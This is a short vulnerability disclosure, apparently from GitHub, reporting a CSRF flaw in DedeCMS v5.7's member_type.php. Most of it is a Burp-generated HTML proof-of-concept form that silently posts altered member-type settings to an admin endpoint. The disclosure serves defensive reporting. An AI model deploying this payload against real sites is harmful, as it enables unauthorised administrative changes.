target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/member_type.php

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/member_type.php" method="POST">
      <input type="hidden" name="dopost" value="save" />
      <input type="hidden" name="ID&#95;1" value="1" />
      <input type="hidden" name="pname&#95;1" value="�&#184;&#173;绾&#167;�&#188;&#154;�&#145;&#152;�&#141;&#138;�&#185;&#180;" />
      <input type="hidden" name="rank&#95;1" value="50" />
      <input type="hidden" name="money&#95;1" value="100" />
      <input type="hidden" name="exptime&#95;1" value="7" />
      <input type="hidden" name="check&#95;1" value="1" />
      <input type="hidden" name="idend" value="1" />
      <input type="hidden" name="pname&#95;new" value="" />
      <input type="hidden" name="rank&#95;new" value="50" />
      <input type="hidden" name="money&#95;new" value="100" />
      <input type="hidden" name="exptime&#95;new" value="7" />
      <input type="hidden" name="check&#95;new" value="1" />
      <input type="hidden" name="imageField" value="�&#161;&#174;�&#174;&#154;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

successed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

16.md

16.md

Files

16.md

Latest commit

History

16.md

File metadata and controls